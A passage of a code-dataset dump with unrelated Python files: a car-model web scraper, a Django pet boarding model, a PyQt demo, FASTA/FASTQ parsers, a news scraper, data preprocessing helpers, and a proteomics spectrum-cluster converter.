top_k:\n idx += 1\n label_name = labels[node_id]\n probability = predictions[node_id]\n top_3.append(label_name)\n percent.append(probability)\n if idx == 3:\n break\n \n\n # 가장 높은 확류을 가진 Top-1 추론 결과를 출력합니다.\n answer = labels[top_k[0]]\n probability = predictions[top_k[0]]\n \n return top_3, percent\n\ndef car_crawling(top_3):\n car_name_list = []\n car_producer_list = []\n car_type_list = []\n car_image_list = []\n car_detail_list = []\n for i in range(3):\n full_name = top_3[i]\n \n idx = 0\n check_list = []\n for j in full_name:\n if j == '_':\n check_list.append(idx)\n idx += 1\n car_name = full_name[check_list[0]+1:check_list[1]]\n car_year = full_name[check_list[1]+1:]\n \n if car_name == 'QM6' and car_year == '2017':\n car_year = '2016'\n if car_name == '투싼1.7D':\n car_name = '투싼'\n\n car_url = 'https://search.naver.com/search.naver?sm=tab_hty.top&where=nexearch&query='+car_year+car_name\n resp = requests.get(car_url)\n soup = BeautifulSoup(resp.content, 'html.parser')\n\n\n try:\n car_name_year = soup.select('#main_pack > div.content_search.section > div > div.contents03_sub > div > div.profile_wrap > dl > dt.name > a > strong')[0].text\n car_name_list.append(car_name_year) \n\n except:\n car_name_list.append(car_name + car_year)\n try:\n car_detail = soup.select('#main_pack > div.content_search.section > div > div.contents03_sub > div > div.profile_wrap > dl > dt.name > a')[0].get('href')\n car_detail_list.append(car_detail)\n detail_url = car_detail\n resp = requests.get(detail_url)\n soup = BeautifulSoup(resp.content, 'html.parser')\n car_type = soup.select('#container > div.spot_end.new_end > div.info_group > span > a.weight')[0].text\n car_type_list.append(car_type)\n car_producer = soup.select('#container > div.spot_end.new_end > div.info_group > span > a.brand')[0].text\n car_producer_list.append(car_producer)\n car_image = soup.select('#carMainImgArea > div.main_img > img')[0].get('src')\n car_image_list.append(car_image)\n\n except:\n car_detail_list.append('확인불가로 네이버검색 요망')\n car_type_list.append('확인불가로 네이버검색 요망')\n car_producer_list.append('확인불가로 네이버검색 요망')\n car_image_list.append('확인불가로 네이버검색 요망')\n return car_name_list, car_type_list, car_producer_list, car_image_list, car_detail_list\n","sub_path":"server/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221940488","text":"from enum import Enum\n\nfrom django.db import models\n\nfrom . import OuiNonChoice\nfrom .animaux import Animal\nfrom .proprietaires import Proprietaire\n\nclass ModeGarde(Enum):\n ENCLOS = \"Enclos\"\n CAGE = \"Cage\"\n\n\nclass Saison(Enum):\n BASSE = \"Basse saison\"\n HAUTE = \"Haute saison\"\n\n\nclass StatutSejourChoice(Enum):\n EN_ATTENTE_VAL = \"En attente de validation\"\n EN_ATTENTE_ARRHES = \"En attente de paiement des arrhes\"\n A_PAYER = \"Validé - A payer\"\n VALIDE = \"Validé\"\n REFUSE = \"Refusé\"\n EN_COURS = \"En cours\"\n TERMINE = \"Terminé\"\n ANNULE = \"Annulé\"\n\nstatuts_rouge = [\n StatutSejourChoice.EN_ATTENTE_VAL.name,\n StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n]\n\nstatuts_vert = [\n StatutSejourChoice.A_PAYER.name,\n StatutSejourChoice.VALIDE.name,\n StatutSejourChoice.EN_COURS.name,\n]\n\n# Statuts de séjour validé par la pension et donc non modifiable via l'appli\nstatuts_valides = [\n StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n StatutSejourChoice.A_PAYER.name,\n StatutSejourChoice.VALIDE.name,\n StatutSejourChoice.EN_COURS.name,\n]\n\n# Statuts de séjour finaux\nstatuts_finaux = [\n StatutSejourChoice.REFUSE.name,\n StatutSejourChoice.ANNULE.name,\n StatutSejourChoice.TERMINE.name,\n]\n\n\nclass Lieu(Enum):\n PENSION = \"A la pension (01470 Montagnieu)\"\n REFUGE = \"Au refuge (38460 Saint-Romain-de-Jalionas)\"\n AEROPORT = \"A l'aeroport Lyon saint exupery\"\n\n\nclass ModePaiement(Enum):\n VIREMENT = \"Par virement\"\n CARTE = \"Par carte\"\n CHEQUE = \"Par chèque\"\n LIQUIDE = \"En liquide\"\n\n\nclass Sejour(models.Model):\n date_mise_a_jour = models.DateField(\n verbose_name=\"Date de mise à jour\", auto_now=True\n )\n date_arrivee = models.DateTimeField(verbose_name=\"Date d'arrivée\")\n date_depart = models.DateTimeField(verbose_name=\"Date de départ\")\n lieu_arrivee = models.CharField(\n max_length=15,\n verbose_name=\"Lieu de dépôt au début du séjour\",\n choices=[(tag.name, tag.value) for tag in Lieu],\n default=Lieu.PENSION.name,\n )\n lieu_depart = models.CharField(\n max_length=15,\n verbose_name=\"Lieu de récupération à la fin du séjour\",\n choices=[(tag.name, tag.value) for tag in Lieu],\n default=Lieu.PENSION.name,\n )\n mode_garde = models.CharField(\n max_length=15,\n verbose_name=\"Mode de garde\",\n choices=[(tag.name, tag.value) for tag in ModeGarde],\n default=ModeGarde.CAGE.name,\n )\n saison = models.CharField(\n max_length=15,\n verbose_name=\"Saison\",\n choices=[(tag.name, tag.value) for tag in Saison],\n default=Saison.BASSE.name,\n )\n cohabitation = models.CharField(\n max_length=3,\n verbose_name=\"Séjour pour cohabitation\",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n nb_cages_fournies = models.IntegerField(\n verbose_name=\"Nombre de cages fournies par le propriétaire \", default=0\n )\n nb_cages_a_fournir = models.IntegerField(\n verbose_name=\"Nombre de cages/enclos à fournir par la pension \",\n default=1,\n )\n montant = models.DecimalField(\n verbose_name=\"Montant à payer\",\n max_digits=7,\n decimal_places=2,\n blank=True,\n null=True,\n )\n arrhes = models.DecimalField(\n verbose_name=\"Montant arrhes\",\n max_digits=7,\n decimal_places=2,\n blank=True,\n null=True,\n )\n montant_restant = models.DecimalField(\n verbose_name=\"Montant restant à payer\",\n max_digits=7,\n decimal_places=2,\n blank=True,\n null=True,\n )\n mode_paiement = models.CharField(\n max_length=15,\n verbose_name=\"Mode de paiement\",\n choices=[(tag.name, tag.value) for tag in ModePaiement],\n default=ModePaiement.VIREMENT.name,\n blank =True\n )\n nb_jours = models.IntegerField()\n animaux = models.ManyToManyField(Animal)\n proprietaire = models.ForeignKey(Proprietaire, on_delete=models.PROTECT, null=True)\n vaccination = models.CharField(\n max_length=3,\n verbose_name=\"Tous les animaux du séjour sont correctement vaccinés pour toute la \"\n \"durée du séjour? (majoration de 90€ si ce n'est pas le cas) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.OUI.name,\n )\n soin = models.CharField(\n max_length=3,\n verbose_name=\"Un de vos animaux nécessite un soin quotidien (a préciser ci-dessous) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n injection = models.CharField(\n max_length=3,\n verbose_name=\"Le soin quotidien de votre animal se fait par injection, \"\n \"inhalation ou est nécessaire 2 fois ou plus par jour \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n commentaire = models.CharField(\n max_length=1000,\n verbose_name=\"Indications sur le séjour (soins divers, points d'attention...)\",\n blank=True,\n )\n annule = models.BooleanField(default=False,\n verbose_name=\"Séjour annulé\")\n pension = models.BooleanField(default=False,\n verbose_name=\"Séjour de la nouvelle pension\")\n longue_duree = models.CharField(\n max_length=3,\n verbose_name=\"Séjour longue durée\",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n montant_jour_longue_duree = models.DecimalField(\n verbose_name=\"Montant quotidien pour pension longue durée\",\n max_digits=7,\n decimal_places=2,\n blank=True,\n null=True,\n )\n nb_photos = models.IntegerField(\n verbose_name=\"Nombre de séances photos et nouvelles personnalisées \"\n \"(maximum une fois par semaine, 3€/séance)\",\n default=0,\n )\n nb_griffes = models.IntegerField(\n verbose_name=\"Coupe de griffe \"\n \"(saisir 1 par animal necessitant une coupe de griffe, 5€/seance) \",\n default=0,\n )\n nb_toilettage = models.IntegerField(\n verbose_name=\"Nombre de séances de toilettage (brossage, tonte, etc...) \"\n \" 5€/seance \",\n default=0,\n )\n regime_verdure = models.CharField(\n max_length=3,\n verbose_name=\"Régime alimentaire 100% verdure (+1€/jour) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n regime_calcium = models.CharField(\n max_length=3,\n verbose_name=\"Régime alimentaire pauvre en calcium (+2€/jour) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n statut = models.CharField(\n max_length=50,\n verbose_name=\"Statut\",\n choices=[(tag.name, tag.value) for tag in StatutSejourChoice],\n default=StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n )\n\n class Meta:\n ordering = ['-date_arrivee']\n\n def __str__(self):\n if self.date_arrivee and self.date_depart:\n return f\"Séjour du {self.date_arrivee:%d/%m/%Y %H:%M} au {self.date_depart:%d/%m/%Y %H:%M}\"\n return \"\"\n\n def save(self, *args, **kwargs):\n self.nb_jours = abs((self.date_depart - self.date_arrivee).days) + 1\n return super().save(*args, **kwargs)\n\n def annulation(self):\n self.annule = True\n\n def animaux_str(self):\n result = ''\n for animal in self.animaux.all():\n result += animal.name + \", \"\n return result[:-2]\n\n def has_statut_vert(self):\n return self.statut in statuts_vert\n\n def has_statut_rouge(self):\n return self.statut in statuts_rouge\n\n def has_statut_valide(self):\n return self.statut in statuts_valides\n\n def has_statut_final(self):\n return self.statut in statuts_finaux\n\n def soins_str(self):\n if self.injection == OuiNonChoice.OUI.name:\n return \"Oui, soins lourds\"\n elif self.soin == OuiNonChoice.OUI.name:\n return \"Oui soins légers\"\n return \"Non\"\n\n def regime_str(self):\n if self.regime_verdure == OuiNonChoice.OUI.name:\n if self.regime_calcium == OuiNonChoice.OUI.name:\n return \"Régime verdure et pauvre en calcium\"\n return \"Régime verdure\"\n if self.regime_calcium == OuiNonChoice.OUI.name:\n return \"Régime pauvre en calcium\"\n return \" - \"\n\n def particularites_str(self):\n result = \"\"\n if self.regime_verdure == OuiNonChoice.OUI.name:\n result += \"Régime verdure \\n\"\n if self.regime_calcium == OuiNonChoice.OUI.name:\n result += \"Régime pauvre en calcium \\n\"\n if self.injection == OuiNonChoice.OUI.name:\n result += \"Soins lourds \\n\"\n elif self.soin == OuiNonChoice.OUI.name:\n result += \"Soins légers \\n\"\n if self.cohabitation == OuiNonChoice.OUI.name:\n result += \"Cohabitation\"\n return result\n\n def options_str(self):\n result = \"\"\n if self.nb_photos > 0:\n result += str(self.nb_photos) + \" séance(s) photo, \"\n if self.nb_griffes > 0:\n result += str(self.nb_griffes) + \" séance(s) coupe de griffes, \"\n if self.nb_toilettage > 0:\n result += str(self.nb_toilettage) + \" séance(s) de toilettage, \"\n result = result[:result.rfind(\",\")]\n return result\n\n\nclass RealisationSejour(models.Model):\n sejour = models.OneToOneField(Sejour, on_delete=models.CASCADE)\n nb_photos = models.IntegerField(\n verbose_name=\"Nombre de séances photos effectuées\",\n default=0,\n )\n nb_griffes = models.IntegerField(\n verbose_name=\"Coupe de griffe effectuées\",\n default=0,\n )\n nb_toilettage = models.IntegerField(\n verbose_name=\"Nombre de séances de toilettage effectuées\",\n default=0,\n )\n\n def get_css_class_for_photos(self):\n if self.nb_photos < self.sejour.nb_photos:\n return \"red\"\n return \"green\"\n\n def get_css_class_for_griffes(self):\n if self.nb_griffes < self.sejour.nb_griffes:\n return \"red\"\n return \"green\"\n\n def get_css_class_for_toilettage(self):\n if self.nb_toilettage < self.sejour.nb_toilettage:\n return \"red\"\n return \"green\"\n\n\n","sub_path":"admin_interface/models/sejours.py","file_name":"sejours.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"535718923","text":"'''\nCreated on 2017. 9. 7.\n@author: callor\n'''\n\nfrom sys import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\n'''\nWidget\n 모든 도구\n 창, 버튼, 입력상자\n 창 : 창도 포함할수 있다\n 포함되는 창 Frame\n Layout Frame\n'''\n\nclass ExamWin(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n \n # ui 를 디자인 하는 method \n def initUi(self):\n \n # 화면의 크기를 설정\n self.setGeometry(300,300,300,300)\n self.setWindowTitle(\"QT Window 연습\")\n self.show() \n \nif __name__ == \"__main__\" :\n app = QApplication(argv) # sys.argv\n mywin = ExamWin()\n \n# mywin.initUi()\n exit(app.exec_())\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ClassPRJ/Class01/QtExam.py","file_name":"QtExam.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"290529109","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nimport re\n\nVALID_NUCLEOTIDES = {'A', 'a',\n 'C', 'c',\n 'G', 'g',\n 'T', 't',\n 'R', 'r',\n 'Y', 'y',\n 'S', 's',\n 'W', 'w',\n 'K', 'k',\n 'M', 'm',\n 'B', 'b',\n 'D', 'd',\n 'H', 'h',\n 'V', 'v',\n 'N', 'n',\n 'X', 'x', } # X for masked nucleotides\n\nREGEX_GZIPPED = re.compile(r'^.+\\.gz$')\n\n\ndef parse_fasta(filepath):\n '''Parse a FASTA/FASTA.GZ file returning a generator yielding tuples of fasta headers to sequences.\n\n Args:\n filepath (str): Fasta file path\n\n Returns:\n generator: yields tuples of (, )\n '''\n if REGEX_GZIPPED.match(filepath):\n logging.debug('Opening \"%s\" as gzipped file', filepath)\n # using os.popen with zcat since it is much faster than gzip.open or gzip.open(io.BufferedReader)\n # http://aripollak.com/pythongzipbenchmarks/\n # assumes Linux os with zcat installed\n import os\n with os.popen('zcat < {}'.format(filepath)) as f:\n yield from _parse_fasta(f, filepath)\n else:\n with open(filepath, 'r') as f:\n yield from _parse_fasta(f, filepath)\n\n\ndef _parse_fasta(f, filepath):\n seqs = []\n header = ''\n line_count = 0\n for line in f:\n if isinstance(line, bytes):\n line = line.decode()\n line = line.strip()\n if line == '':\n continue\n if line[0] == '>':\n if header == '':\n header = line.replace('>', '')\n else:\n yield header, ''.join(seqs)\n seqs = []\n header = line.replace('>', '')\n else:\n non_nucleotide_chars_in_line = set(line) - VALID_NUCLEOTIDES\n if len(non_nucleotide_chars_in_line) > 0:\n msg = '{file}: Line {line} contains the following non-nucleotide characters: {chars}'.format(\n file=filepath,\n line=line_count,\n chars=', '.join([str(x) for x in non_nucleotide_chars_in_line]))\n logging.warning(msg)\n seqs.append(line.upper())\n line_count += 1\n yield header, ''.join(seqs)\n\n\ndef parse_fastq(filepath):\n \"\"\"Parse a FASTQ/FASTQ.GZ file returning a generator yielding tuples of FASTQ entry headers and sequences.\n\n Args:\n filepath (str): FASTQ/FASTQ.GZ file path\n\n Returns:\n generator: yields tuples of (, )\n \"\"\"\n if REGEX_GZIPPED.match(filepath):\n logging.debug('Opening \"%s\" as gzipped file', filepath)\n # using os.popen with zcat since it is much faster than gzip.open or gzip.open(io.BufferedReader)\n # http://aripollak.com/pythongzipbenchmarks/\n # assumes Linux os with zcat installed\n import os\n with os.popen('zcat < {}'.format(filepath)) as f:\n yield from _parse_fastq(f)\n else:\n with open(filepath, 'r') as f:\n yield from _parse_fastq(f)\n\n\ndef _parse_fastq(f):\n \"\"\"Simple FASTQ parser which yields the header and sequence ignoring the quality scores\n\n Args:\n f: file-like object\n\n Yields:\n Tuple of FASTQ entry header and sequence\n \"\"\"\n header = ''\n seq = ''\n skip = False\n for line in f:\n if skip:\n skip = False\n continue\n line = line.strip()\n if line == '':\n continue\n if line[0] == '@':\n header = line.replace('@', '')\n elif line[0] == '+':\n yield header, seq\n skip = True\n else:\n seq = line.upper()\n","sub_path":"bio_hansel/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240661460","text":"from GoogleNews import GoogleNews\nfrom newsplease import NewsPlease\nimport requests\nimport urllib\nimport numpy as np\ndef isRedirect(url):\n\ttry:\n\t\tresponse = requests.get(url, allow_redirects=True)\n\t\tif response.url != url:\n\t\t\treturn True\n\texcept Exception as e:\n\t\treturn True\n\treturn False\ndef get_content(result):\n\ttitles = []\n\ttexts = []\n\tfor i, news in enumerate(result):\n\t\turl = news['link']\n\t\tif isRedirect(url): continue \n\t\tresponse = requests.get(url)\n\t\tif response.status_code != 200: continue\n\t\ttry:\n\t\t\tarticle = NewsPlease.from_url(url)\n\t\texcept Exception as e:\n\t\t\tcontinue\n\t\tif (article.maintext == None or article.title == None): continue\n\t\telse:\n\t\t\t#data = {\"title\":article.title,\"text\":article.maintext}\n\t\t\ttitles.append(article.title)\n\t\t\ttexts.append(article.maintext)\n\t\t\t#ret.append(article.title + article.maintext)\n\treturn (titles,texts)\n\ndef getNews(topic, start_time, end_time):\n\tgooglenews = GoogleNews(start = start_time, end = end_time)\n\ttitles = []\n\ttexts = []\n\tlabels = []\n\tfor i in range(1,2):\n\t\tgooglenews.clear()\n\t\tgooglenews.search(topic)\n\t\tgooglenews.getpage(i)\n\t\ttmp = googlenews.result()\n\n\t\t#result += [x[\"title\"]+x[\"desc\"] for x in tmp]\n\t\t(tmp_title , tmp_text) = get_content(tmp)\n\t\ttitles += tmp_title\n\t\ttexts += tmp_text\n\t\tif i == 1:\n\t\t\tlabels += [1 for _ in range(len(tmp_text))]\n\t\telse:\n\t\t\tlabels += [0 for _ in range(len(tmp_text))]\n\t#labels = np.array(labels)\n\treturn (titles , texts , labels)\n\n\n","sub_path":"getNews.py","file_name":"getNews.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"620894656","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path(\r\n 'xlsx/////////',\r\n views.xlsx, name='report-xlsx'),\r\n path('request_summary/', views.show_request_summary, name='req_summary'),\r\n # path('pdf/', views.pdf1, name='report-pdf1'),\r\n # path('pdf1/', views.pdf, name='report-pdf'),\r\n path('view/', views.reportview , name='view_report'),\r\n]\r\n","sub_path":"report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241163707","text":"\nimport pandas as pd\nimport numpy as np\n\ndef wind_direction_dummies(dataframe, wind_direction, drop_energy=False):\n \n dataframe[wind_direction] = dataframe[wind_direction].apply(lambda x: '7.0' if x==360 else str(x//45))\n \n dataframe = pd.get_dummies(dataframe, columns=[wind_direction], drop_first=True)\n \n if drop_energy:\n c = list(dataframe.columns)\n c.remove('dangjin_floating')\n c = c + ['dangjin_floating']\n\n dataframe = dataframe[c]\n\n return dataframe\n\n\n\n\n\n\ndef dataframe_interpolation_by_spline(dataframe, columns):\n import time\n start = time.time()\n for column in columns:\n dataframe[column].interpolate(method='spline', order=3, inplace=True)\n print(f'processing time : {time.time()-start} s')\n\n\ndef dataframe_interpolation_by_linear(dataframe, columns):\n import time\n start = time.time()\n for column in columns:\n dataframe[column].interpolate(method='linear', inplace=True)\n print(f'processing time : {time.time()-start} s')\n\n\n\n\n\n\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef dataframe_normalize(dataframe, exclude_column_list):\n \n scaler = MinMaxScaler()\n\n normalize_columns = list(dataframe.columns)\n for column in exclude_column_list:\n normalize_columns.remove(column)\n\n dataframe[normalize_columns] = pd.DataFrame(scaler.fit_transform(dataframe.drop(columns=exclude_column_list)))\n \n\n return dataframe\n\n\n\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.family'] = 'NanumGothic'\n\ndef hist_features(dataframe, exclude_column_list):\n\n hist_columns = list(dataframe.columns)\n for column in exclude_column_list:\n hist_columns.remove(column)\n\n n = len(hist_columns)\n\n if n < 10:\n n1 = 2\n n2 = (n // 2) + 1 if n%2 else n // 2\n else:\n n1 = 3\n n2 = (n // 3) + 1 if n%3 else n // 3\n \n \n fig, axs = plt.subplots(n1, n2)\n plt.subplots_adjust(left=0.125, bottom=0.1, right=2.0, top=1.5, wspace=0.2, hspace=0.35) \n\n\n for i in range(n1):\n for j in range(n2):\n \n if (i*n2 + j) == n : break\n\n axs[i, j].hist(dataframe[hist_columns[i*n2 + j]])\n axs[i, j].set_title(hist_columns[i*n2 + j])\n\n \n\ndef fcst_augment(dataframe):\n\n start = dataframe[\"forecast\"].iloc[0]\n end = dataframe[\"forecast\"].iloc[-1]\n\n time_index = pd.Series(pd.date_range(start, end, freq='H'), name=\"time_index\")\n\n dataframe[\"forecast\"] = pd.to_datetime(dataframe[\"forecast\"])\n dataframe = pd.merge(time_index, dataframe, how='outer', left_on=\"time_index\", right_on=\"forecast\").drop(columns=[\"time\", \"forecast\"])\n\n return dataframe\n\n\n\ndef nona_mugja(dataframe):\n\n dataframe[\"6시간강수량\"] = dataframe[\"6시간강수량\"] / 6\n dataframe[\"6시간적설\"] = dataframe[\"6시간적설\"] / 6\n \n dataframe[\"6시간강수량\"].fillna(method='ffill', inplace=True)\n dataframe[\"6시간적설\"].fillna(method='ffill', inplace=True) \n\n return dataframe","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"492203735","text":"import turtle\n\ndef draw_shapes():\n window = turtle.Screen()\n window.bgcolor(\"black\")\n #draw_square()\n #draw_circle()\n #draw_triangle()\n\n brad = turtle.Turtle()\n brad.shape(\"circle\")\n brad.color(\"yellow\") \n\n for i in range(30):\n draw_square(brad)\n brad.right(12) \n \n window.exitonclick()\n\ndef draw_square(brad): \n for i in range(4):\n brad.forward(100)\n brad.right(90)\n \ndef draw_circle():\n angie = turtle.Turtle()\n angie.shape(\"arrow\")\n angie.color(\"blue\")\n angie.circle(100)\n\ndef draw_triangle():\n bob = turtle.Turtle()\n bob.shape(\"square\")\n bob.color(\"red\")\n\n for i in range(3):\n bob.forward(200)\n bob.left(120)\n \ndraw_shapes()\n\n","sub_path":"Lessons challenges/Intro to Python/OOP/turtles/draw_square.py","file_name":"draw_square.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267100723","text":"import numpy as np\nimport pandas as pd\n\n#DataFrame\ndf = pd.read_csv('ecommerce_data.csv')\n\n#preview\n#print(df.head())\n\ndef get_data():\n df = pd.read_csv('ecommerce_data.csv')\n data = df.as_matrix()\n \n X = data[:, :-1]\n Y = data[:, -1]\n \n #Normalising features \n X[:,1] = (X[:,1]-X[:,1].mean())/X[:,1].std()\n X[:,2] = (X[:,2]-X[:,2].mean())/X[:,2].std()\n\n #Time of day (ONE HOT ENCODING 4 different categorical values) \n N, D = X.shape\n #print(X.shape)\n X2 = np.zeros((N,D+3))\n X2[:,0:(D-1)] = X[:,0:(D-1)]\n \n for i in range(N):\n t = int(X[i, D-1])\n X2[i,t+D-1] = 1 \n \n #other way of doing this\n #Z = np.zeros((N,4))\n #Z[np.arange(N),X[:,D-1].astype(np.int32)] = 1\n #assert this\n #assert(np.abs(X2[:,-4] - Z).sum() < 10e-10)\n return X2,Y\n\ndef get_binary_data():\n X,Y = get_data()\n X2 = X[Y<=1]\n Y2 = Y[Y <= 1]\n return X2, Y2\n\n ","sub_path":"NueralNets/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642015257","text":"import click\nfrom pyteomics import mgf, mzml\nfrom pyopenms import *\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\n\ndef print_help():\n ctx = click.get_current_context()\n click.echo(ctx.get_help())\n ctx.exit()\n\n\ndef buid_usi_accession(cluster_id, peptide_sequence, scan, px_accession, raw_name, charge):\n usi = cluster_id + \";\" + 'mzspec' + \":\" + px_accession + \":\" + raw_name + \":\" + \"scan:\" + str(scan)\n if peptide_sequence is not None:\n usi = usi + \":\" + peptide_sequence + \"/\" + str(charge)\n return usi\n\n\ndef read_peptides(mq_msms):\n peptides = {}\n with open(mq_msms) as mq_peptides:\n next(mq_peptides) # skip header\n for line in mq_peptides:\n words = line.split('\\t')\n rscan = int(words[1])\n rpept = words[7][1:-1]\n peptides[rscan] = rpept\n return peptides\n\n\ndef read_clusters(mrcluster_clusters):\n clusters = {}\n cluster_prefix = 'cluster-'\n cluster_index = 1\n with open(mrcluster_clusters) as cluster_def:\n for line in cluster_def:\n if not line.strip():\n cluster_index = cluster_index + 1\n else:\n words = line.split('\\t')\n clusters[int(words[1])] = cluster_prefix + str(cluster_index)\n return clusters\n\n\n@click.command('convert-mq-marcluster', short_help='Command to convert MaxQuant Results and MaCluster into MGF')\n@click.option('--mq_msms', '-p', help='Peptide information from MaxQuant')\n@click.option('--mrcluster_clusters', '-c', help='The information of the clusters from MaRCluster')\n@click.option('--mgf_file', '-s', help='The mgf with the corresponding spectra')\n@click.option('--output', '-o', help='Output mgf containing the cluster and the spectra information')\n@click.option('--px_accession', '-a', help='ProteomeXchange accession of the project')\n@click.option('--raw_name', '-r', help='Original name of the RAW file in proteomeXchange')\ndef convert_mq_mracluster_mgf(mq_msms, mrcluster_clusters, mgf_file, output, px_accession, raw_name):\n if mq_msms is None or mrcluster_clusters is None or mgf_file is None:\n print_help()\n\n # Read the input spectra\n input_spectra = mgf.read(mgf_file)\n spectra_list = list(input_spectra)\n print('Number of Spectra: ' + str(len(spectra_list)))\n\n # Read the msms.txt files using, for now the peptides will be a dictionary, where the key is the scan number\n # and the values is the peptide sequence. We need to be aware that we can have cases when one scan can be associated with more\n # than one peptide sequence\n\n peptides = read_peptides(mq_msms)\n print('Number of Peptides: ' + str(len(peptides)))\n\n # Read clusters, the clusters will be a map where the key is the scan and the value is the cluster where the scan belongs\n clusters = read_clusters(mrcluster_clusters)\n print(\"Number of Clusters: \" + str(len(clusters)))\n\n for scan in clusters:\n print('scan: ' + str(scan))\n for spectra in spectra_list:\n if spectra['params']['title'].endswith('scan=' + str(scan)):\n cluster_accession = clusters[scan]\n if scan not in peptides:\n peptide_sequence = None\n else:\n peptide_sequence = peptides[scan]\n charge = int(spectra['params']['charge'][0])\n spectra['params']['title'] = buid_usi_accession(cluster_accession, peptide_sequence, scan, px_accession,\n raw_name, charge)\n mgf.write([spectra], output)\n\n\n@click.command('convert-mq-marcluster-mzml', short_help='Command to convert MaxQuant Results and MaCluster into MGF')\n@click.option('--mq_msms', '-p', help='Peptide information from MaxQuant')\n@click.option('--mrcluster_clusters', '-c', help='The information of the clusters from MaRCluster')\n@click.option('--mzml_file', '-s', help='The mgf with the corresponding spectra')\n@click.option('--output', '-o', help='Output mgf containing the cluster and the spectra information')\n@click.option('--px_accession', '-a', help='ProteomeXchange accession of the project')\n@click.option('--raw_name', '-r', help='Original name of the RAW file in proteomeXchange')\ndef convert_mq_mracluster_mzml(mq_msms, mrcluster_clusters, mzml_file, output, px_accession, raw_name):\n if mq_msms is None or mrcluster_clusters is None or mzml_file is None:\n print_help()\n\n # Read the input spectra\n exp = MSExperiment()\n MzMLFile().load(mzml_file, exp)\n sl = SpectrumLookup()\n sl.readSpectra(exp, \"=(?\\\\d+)$\")\n\n count = sum(map(lambda spec: spec.getMSLevel() == 2, exp))\n print(\"Number of Spectra: \" + str(count))\n\n # Read the msms.txt files using, for now the peptides will be a dictionary, where the key is the scan number\n # and the values is the peptide sequence. We need to be aware that we can have cases when one scan can be associated with more\n # than one peptide sequence\n\n peptides = read_peptides(mq_msms)\n print('Number of Peptides: ' + str(len(peptides)))\n\n # Read clusters, the clusters will be a map where the key is the scan and the value is the cluster where the scan belongs\n clusters = read_clusters(mrcluster_clusters)\n print(\"Number of Clusters: \" + str(len(clusters)))\n\n new_exp = MSExperiment(exp)\n new_exp.clear(False)\n for scan in clusters:\n print('scan: ' + str(scan))\n index = sl.findByScanNumber(scan)\n spectra = MSSpectrum(exp[index])\n cluster_accession = clusters[scan]\n if scan in peptides:\n peptide_sequence = peptides[scan]\n spectra.setMetaValue(\"Peptide sequence\", peptide_sequence.encode(\"UTF-8\"))\n spectra.setMetaValue(\"Cluster accession\", cluster_accession.encode(\"UTF-8\"))\n\n new_exp.addSpectrum(spectra)\n\n MzMLFile().store(output, new_exp)\n\n@click.group(context_settings=CONTEXT_SETTINGS)\ndef cli():\n \"\"\"This is the main tool that give access to all commands and options provided by the pypgatk\"\"\"\n\n\ncli.add_command(convert_mq_mracluster_mgf)\ncli.add_command(convert_mq_mracluster_mzml)\n\nif __name__ == \"__main__\":\n cli()\n\n# \n# https://www.ebi.ac.uk/ols/ontologies/ms/terms?iri=http%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FMS_1000889\n\n# \n# \n","sub_path":"src/convert_mgf_cluster.py","file_name":"convert_mgf_cluster.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75113707","text":"# https://www.codewars.com/kata/fruit-machine/train/python\n\ndef fruit(reels, spins):\n fruit_array = []\n checked_array = []\n s0 = spins[0]\n s1 = spins[1]\n s2 = spins[2]\n\n r0 = reels[0] \n r1 = reels[1] \n r2 = reels[2] \n\n fruit_array.append(r0[s0])\n fruit_array.append(r1[s1])\n fruit_array.append(r2[s2])\n freq = {x:fruit_array.count(x) for x in fruit_array}\n print(freq)\n\n for key, item in freq.items():\n if 'Wild' in freq and 